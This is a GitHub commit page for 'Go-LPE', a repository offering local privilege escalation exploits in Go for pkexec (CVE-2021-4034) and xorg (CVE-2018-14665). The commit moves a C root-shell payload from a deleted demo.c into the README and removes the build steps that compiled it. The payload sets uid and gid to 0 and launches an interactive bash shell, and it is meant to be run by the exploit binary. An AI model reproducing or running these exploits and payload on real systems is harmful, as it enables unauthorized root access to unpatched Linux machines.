Skip to content

Commit

Permalink
no more c files, happy?
Browse files Browse the repository at this point in the history
  • Loading branch information
jm33-m0 committed Sep 7, 2023
1 parent e3e7fed commit 8a056d5
Show file tree
Hide file tree
Showing 3 changed files with 21 additions and 23 deletions.
22 changes: 21 additions & 1 deletion README.md
Original file line number Diff line number Diff line change
@@ -1,12 +1,13 @@
# Go-LPE

A collection of LPE exploits written in Go

![image](https://user-images.githubusercontent.com/10167884/151522601-dc61ba4b-1144-4c57-a548-f9bddd17b96e.png)

## Exploits

| CVE | Description | Link |
|------------|---------------------------------------------------------------------|-----------------------------------------------|
| ---------- | ------------------------------------------------------------------- | --------------------------------------------- |
| 2021-4034 | pkexec exploit rewritten in pure Go that is based on blasty's poc | https://haxx.in/files/blasty-vs-pkexec.c |
| 2018-14665 | xorg (a demo) that works in environments with certain xorg versions | https://www.cvedetails.com/cve/CVE-2018-14665 |

Expand All @@ -28,5 +29,24 @@ func main() {
}
```

```c
// go:build ignore
// +build ignore
// musl-gcc -static -s -o emp3r0r demo.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
puts("go-lpe has successfully got root!");
setuid(0);
seteuid(0);
setgid(0);
setegid(0);
system("/bin/bash -i");
return 0;
}
```
- Note that this tool tries to execute `./emp3r0r -replace`
- If you want it to execute other stuff, just write a wrapper
7 changes: 0 additions & 7 deletions build.sh
Original file line number Diff line number Diff line change
Expand Up @@ -7,10 +7,3 @@
CGO_ENABLED=0 go build -o ../../golpe.exe -ldflags="-s -w" -trimpath
command -v upx >/dev/null && upx ../../golpe.exe
)

(
echo "building demo.c"
musl-gcc -static -s -o emp3r0r.exe demo.c || echo "musl-gcc not found"
command -v upx >/dev/null && upx emp3r0r.exe
echo "Rename emp3r0r.exe to emp3r0r and use it with golpe.exe"
)
15 changes: 0 additions & 15 deletions demo.c

This file was deleted.

0 comments on commit 8a056d5

Please sign in to comment.